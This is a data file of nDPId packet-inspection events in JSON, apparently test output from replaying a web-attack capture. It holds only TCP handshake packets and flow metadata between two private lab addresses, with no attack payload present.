-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3298,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1499347364056,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347364056,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+jlAAD4Gy5asEAABwKgKMtxQAFCMb5E4AAAAAKACchD4fwAAAgQFtAQCCAoBOmsBAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":2,"flow_last_seen":1499347364056,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347364056,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3FBchRpEjG+ROaAScSBCOgAAAgQFtAQCCAoD5Dx3ATprAQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3300,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":3,"flow_last_seen":1499347364057,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347364057,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+jpAAD4Gy52sEAABwKgKMtxQAFCMb5E5XIUaRYAQAOXhQAAAAQEICgE6awID5Dx3"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347235716,"flow_last_seen":1499347241682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55038,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347235716,"flow_last_seen":1499347241682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55038,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347238260,"flow_last_seen":1499347243683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55064,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347238260,"flow_last_seen":1499347243683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55064,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347239517,"flow_last_seen":1499347244683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55078,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347239517,"flow_last_seen":1499347244683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55078,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347240786,"flow_last_seen":1499347246684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55092,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347240786,"flow_last_seen":1499347246684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55092,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347243333,"flow_last_seen":1499347248684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55118,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347243333,"flow_last_seen":1499347248684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347244580,"flow_last_seen":1499347249685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55132,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347244580,"flow_last_seen":1499347249685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347365320,"flow_last_seen":1499347365320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347365320,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1499347365320,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347365320,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CZFAAD4GvD+sEAABwKgKMtxeAFCYJmWsAAAAAKACchAXCwAAAgQFtAQCCAoBOmw9AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":2,"flow_last_seen":1499347365320,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347365320,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3F6n4QiemCZlraAScSAl0wAAAgQFtAQCCAoD5D2zATpsPQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":3,"flow_last_seen":1499347365321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347365321,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CZJAAD4GvEasEAABwKgKMtxeAFCYJmWtp+EIn4AQAOXE2QAAAQEICgE6bD4D5D2z"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347366586,"flow_last_seen":1499347366586,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347366586,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56428,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1499347366586,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347366586,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8voxAAD4GB0SsEAABwKgKMtxsAFDi5tP2AAAAAKACchBctQAAAgQFtAQCCAoBOm16AAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":2,"flow_last_seen":1499347366586,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347366586,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3GzFvqcC4ubT96AScSCt\/gAAAgQFtAQCCAoD5D7wATptegEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3321,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":3,"flow_last_seen":1499347366587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347366587,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vo1AAD4GB0usEAABwKgKMtxsAFDi5tP3xb6nA4AQAOVNBgAAAQEICgE6bXoD5D7w"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347369077,"flow_last_seen":1499347369077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347369077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1499347369077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347369077,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NkNAAD4Gj42sEAABwKgKMtyGAFA0BFmqAAAAAKACchCDWwAAAgQFtAQCCAoBOm\/pAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3338,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":2,"flow_last_seen":1499347369077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347369077,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Ib842EVNARZq6AScSDg\/gAAAgQFtAQCCAoD5EFeATpv6QEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":3,"flow_last_seen":1499347369078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347369078,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NkRAAD4Gj5SsEAABwKgKMtyGAFA0BFmr\/ONhFoAQAOWABgAAAQEICgE6b+kD5EFe"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347370339,"flow_last_seen":1499347370339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347370339,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56468,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1499347370339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347370339,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iG5AAD4GPWKsEAABwKgKMtyUAFBZvPlKAAAAAKACchC8uQAAAgQFtAQCCAoBOnEkAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":2,"flow_last_seen":1499347370339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347370339,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3JQ4r3KfWbz5S6AScSDLywAAAgQFtAQCCAoD5EKaATpxJAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":3,"flow_last_seen":1499347370340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347370340,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iG9AAD4GPWmsEAABwKgKMtyUAFBZvPlLOK9yoIAQAOVq0wAAAQEICgE6cSQD5EKa"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3361,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347371602,"flow_last_seen":1499347371602,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347371602,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3361,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1499347371602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347371602,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jiZAAD4GN6qsEAABwKgKMtyiAFAEW\/xGAAAAAKACchAN1QAAAgQFtAQCCAoBOnJgAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3362,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":2,"flow_last_seen":1499347371602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347371602,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3KLBqaHpBFv8R6AScSBjZgAAAgQFtAQCCAoD5EPWATpyYAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":3,"flow_last_seen":1499347371603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347371603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jidAAD4GN7GsEAABwKgKMtyiAFAEW\/xHwamh6oAQAOUCbgAAAQEICgE6cmAD5EPW"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347374136,"flow_last_seen":1499347374136,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374136,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1499347374136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347374136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DktAAD4Gt4WsEAABwKgKMty8AFAnfHqSAAAAAKACchBp1QAAAgQFtAQCCAoBOnTZAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":2,"flow_last_seen":1499347374136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347374136,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3LxHeFJ\/J3x6k6AScSCGiQAAAgQFtAQCCAoD5EZPATp02QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3381,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":3,"flow_last_seen":1499347374137,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347374137,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DkxAAD4Gt4ysEAABwKgKMty8AFAnfHqTR3hSgIAQAOUlkAAAAQEICgE6dNoD5EZP"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347247114,"flow_last_seen":1499347252685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347247114,"flow_last_seen":1499347252685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347248373,"flow_last_seen":1499347253687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55172,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347248373,"flow_last_seen":1499347253687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347249651,"flow_last_seen":1499347254687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55186,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347249651,"flow_last_seen":1499347254687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55186,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347252179,"flow_last_seen":1499347257688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55212,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 